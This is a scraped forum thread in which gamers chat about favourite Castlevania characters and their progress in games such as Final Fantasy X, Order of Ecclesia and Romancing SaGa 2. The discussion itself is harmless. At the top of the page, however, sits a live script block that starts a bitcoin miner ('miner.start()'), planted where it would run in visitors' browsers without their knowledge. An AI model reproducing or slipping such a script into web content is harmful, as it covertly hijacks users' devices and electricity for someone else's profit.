<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Re: What games are you playing?

Postby Sorel » 5 years ago

Who is your favourite Castlevania character?

Mine's definetly Soma Cruz.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

Fluffi-dono wrote:Who is your favourite Castlevania character?
Invisible floors.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Bean

Postby Bean » 5 years ago

Since two of my favorites are the Rondo of Blood PSP remake and Symphony of the Night, Richter Backflippin' Belmont. Now up to 80% in Mirror of Fate. I kind of want this one done soon.

Saturn Moriya

Postby Saturn Moriya » 5 years ago

Have to go with Alucard.

OH MY GOD Crimzon Clover stage 5. It's like I'm playing bullet hell for the first time all over again how even do I anything.

Your blood their blood serves the same!!

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

The only Castlevania games I've finished up until now are the original and Dracula X (yes that weird pseudo-port of Rondo on the SNES).

So Richter, I guess?

I really need to play the rest of the series someday.
twitter (spicy at times!) | avatar by kuma

who cares:

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

Since Ecclesia and 1 (and one of the SNES ones... Dracula X? Rondo of Blood?) are the only ones I've played... I guess Shanoa >_> I would die of excitement if she were to somehow appear in Smash Bros.
[actually I did play a ROM of Aria of Sorrow but I still like Shanoa]
YelseyKing wrote:Asking as a perfectionist who hates missing out on stuff... How feasible is it to get A or S ranks? Are the games set up for it better than the classic and X series? And do the games provide means to retry if your rank is lower than you'd like? Because watching Bean and RoahmMythril's LPs, I've seen some utterly insane things you need to do in order to perfect run stages. Especially the bosses, who can be so horrifically random...
If you want A/S ranks, you basically need to be perfect and never do anything wrong ever- no Cyber Elves, don't get hit, kill lots of enemies, beat the level fast. Just don't even bother unless you're the kind of person that likes that kind of 'challenge'. And the only way to 'retry' is to not save and reload your old file and try again, so... yeah.

Re: Blackmore;
oh right I can just play Boss Rush on an old file to fight him for myself ha ha ha yeah okay

Everything he does is "predictable" and avoidable- managed to beat him taking only one or two hits (could do it with none after a few tries). The attack that I discussed in my last response was actually the opposite- jump over the first claw, duck under the second, then jump again; if that's worth anything.

...Also I accidentally discovered that loading my current Lv1 file for Boss Rush automatically bumped me up to level 50. So that's something new I learned.
And then I beat him again with my 'subpar' glyphs/equipment/lack of double-jump :v So I think it just takes practice.
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

swirlybomb wrote:If you want A/S ranks, you basically need to be perfect and never do anything wrong ever- no Cyber Elves, don't get hit, kill lots of enemies, beat the level fast. Just don't even bother unless you're the kind of person that likes that kind of 'challenge'. And the only way to 'retry' is to not save and reload your old file and try again, so... yeah.
It's kind of a conundrum. I'm, like I said, a bit of a perfectionist, but I usually avoid such "bragging rights" challenges, unless there's some reliable way to deal with them (such as the battle ranks in the Advance Wars games, where you can save in battle to experiment). But every so often, you'll get a game that *requires* this kind of perfection in order to unlock tangible rewards, which kinda makes me cringe. My perfectionist side demands I at least try, and if I'm not able to do them, I feel like I've not fully completed that game.

To this day, I still feel like I haven't "finished" Resident Evil 4, for instance. Not because I haven't completed Hard Mode. That's just bragging rights, and I don't find higher difficulty levels especially "challenging" (nor rewarding) because just about all they tend to do is ramp up the damage enemies can both deal and receive, which makes them more tedious than hard. No, it's because I'm simply no good at the Mercenaries minigame, and therefore can't unlock the Handcannon. I don't technically even *need* it, since I have two better unlockable weapons, but its existence -- knowing it's there, but being unable to get it without loads and loads of practice, trial, and error -- just bugs me.

That said, once I get to the Zero series, I won't worry *too* much about rank, at least my first time through each game. It's more important that I *learn* the games before trying to *master* them, after all.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Ashan
The world has become a place

Postby Ashan » 5 years ago

Wow, so that third Seymour fight ends up being pretty easy if you just kinda brute force your way through.

I basically just ran around grinding for a while last night until Tidus learned Hastega, and then I filled all of my aeons' overdrive meters to full before the battle, then I just went in, casted Hastega, and ran through my full list of Aeons, using their overdrives one at a time and that killed him. At one point he got a turn where he casted reflect on himself but immediately after that I was able to cast Dispel on him and go back to doing crazy amounts of damage to him. In the end he had like 3 turns.

YelseyKing

Congrats on beating Seymour Flux. He catches *everyone* off guard the first time through; the Aeon Overdrive strategy is a perennial favorite.

There's another "That One Boss" coming up... I won't spoil too much, but a word of warning...
When this boss -- and you'll know it when you see it -- attempts to zombify your entire team... don't be too quick to remove it from everyone. It has an instant death attack that can -- and *will* -- kill the entire team unless they either have "Deathproof" armor (unlikely) or the Zombie status.

Moists:

Ivy

Postby Ivy » 5 years ago

Still playing Mario kart 8

Send help
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

Oh yeah, Hastega is something you should really have by this point too. But if Aeon-rushing works, it works!

Cleared the Skeleton Cave on Order Of Ecclesia today... wow that was pretty ridiculous. Torpor came in SUPER-handy for Misty Forest Road; I really only used it a bit during my very first run through the game (funny enough, also finding it very useful on Misty Forest Road to freeze the Grave Digger enemies, since I wasn't skilled enough to pass them otherwise), but I imagine it works on every 'human-type' enemy, which could definitely be useful in this run.
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

Alice
Pronouns: Girl person

Postby Alice » 5 years ago

Soma and Shanoa are best.

Edit: If you're counting non-playable or unlockable characters as well as main characters I'd go with Old Axe Armor from Dawn of Sorrow too.

Saturn Moriya

Postby Saturn Moriya » 5 years ago

I don't know if I ever get into the MMZ games. It just doesn't interest me much. It's too different from Classic and X for me to care about it for now.

Just made it past the part in Secret of Mana that made me ragequit last time, "Cute Little Spiky". The super wonky controls, hitboxes and AI really bothered me at the time, and when that boss made me feel like I had no control at all I just didn't wanna play anymore.

This time around I've got more of a feel for all the things, and while fighting still feels like a clusterfuck I'm actually having alot of fun this time around.

Your blood their blood serves the same!!

LatexHydra

Postby LatexHydra » 5 years ago

Alucard all the way

Bean

Postby Bean » 5 years ago

I beat Mirror of Fate last night. That game's second act felt like it was setting up the final battle better than the third act did. The fact that I was able to take down the final boss in one try was another head-scratching moment. It definitely felt slapped together in that final bit, so while not a failure, it is currently the worst 3DS game I've played.

Window Squeegee
Hog with a Blog

Postby Window Squeegee » 5 years ago

Favorite castlevania character? Mine would have to be a tie between:

Soma
Alucard
Flying Medusa Heads

Sorel
In the shadows

Window Squeegee wrote:Flying Medusa Heads
YOU MONSTER

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 5 years ago

Fluffi-dono wrote:
YOU MONSTER
The colored variants I can tolerate: it's the grey ones that are the most annoying.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

Did the following events in Romancing SaGa 2:
The one where you drop the Ice Seed into the volcano, the one where Noel takes over that desert town with the three towers, the one with the demonstone, the one with Garon and the one with the mermaid.

I also got Imperial Guards, woop woop~
I had to cheat to beat the Pyrohydra on the mermaid quest. It always attacks twice per round, one of its physical attacks deals 1000+ HP damage in a game where the HP cap is 999, and it has a high-damage party-wide fire attack.

I also have no multi-character healing spells and you have to equip an item to use it.

This game is batshit with its difficulty at times.
Medusa Head is mai waifu
twitter (spicy at times!) | avatar by kuma

who cares:

Sorel
In the shadows

KobaBeach wrote:
Medusa Head is mai waifu
EVEN WORSE

BTW I gonna torture myself with an extra Level 1 Hard Mode Shanoa Run.

Ishntknew

Postby Ishntknew » 5 years ago

Julius is awesome. Man gets mad props for being the one to finally put down Dracula once and for all. (Okay, lots of other people were involved in that too.)
I'm a lizard's nightmare

Backloggery:
daypular

metasomnia?
the calm before the storm
First name: Meta

Postby metasomnia? » 5 years ago

Hammer, from Aria of Sorrow.

Dude doesn't get enough love

YelseyKing

metasomnia wrote:

Hammer, from Aria of Sorrow.

Dude doesn't get enough love
Indeed. There's dummied out dialogue in Dawn of Sorrow of a scene in which he'd join as a playable character during Julius mode (where he'd probably have acted as the otherwise missing Grant parallel)... and apparently one of the later games (though I forget which) *also* had unused assets suggesting he was intended to appear. What does Konami have against poor Hammer?!

Also, my favorite character would probably also be Soma. Or Alucard. Or, yeah, Hammer. I think Dawn of Sorrow overall was my favorite entry in the series. I loved the atmosphere, and as someone who actually *enjoys* collectathons, I loved gathering all the souls, as well as the many unique aspects they provided.

Unfortunately, I can't share the love for Shanoa or Order of Ecclesia as a whole... They finally include a female protagonist, then intentionally derail her by having her lose her emotions and memories right from the outset, making her about as pleasant and likeable as Squall from FF8. And I didn't care much for the game overall; the gameplay was fine, and I enjoyed the fact that it was actually *challenging* (something the rest of the "Metroidvania" parts of the series were... decidedly *not*), but the de-emphasis on exploration, which had been a huge part of the series since Symphony of the Night, turned me off. Some of the areas were literally straight lines!

Moists:

metasomnia?
the calm before the storm
First name: Meta

Postby metasomnia? » 5 years ago

Finally started playing Mother 3, Prepare To Cry And Laugh And Generally Be Weirded Out Edition.

Beware exploding trees, I'm coming for you.

Alice
Pronouns: Girl person

Postby Alice » 5 years ago

Ishntknew wrote:Man gets mad props for being the one to finally put down Dracula once and for all. (Okay, lots of other people were involved in that too.)
They really should make an actual game covering this.
YelseyKing wrote:Unfortunately, I can't share the love for Shanoa or Order of Ecclesia as a whole... They finally include a female protagonist, then intentionally derail her by having her lose her emotions and memories right from the outset, making her about as pleasant and likeable as Squall from FF8.
I don't think she's really that unlikable. She's not rude or broody or anything. She's just extremely serious and unemotional.

Return to “the cartridgé”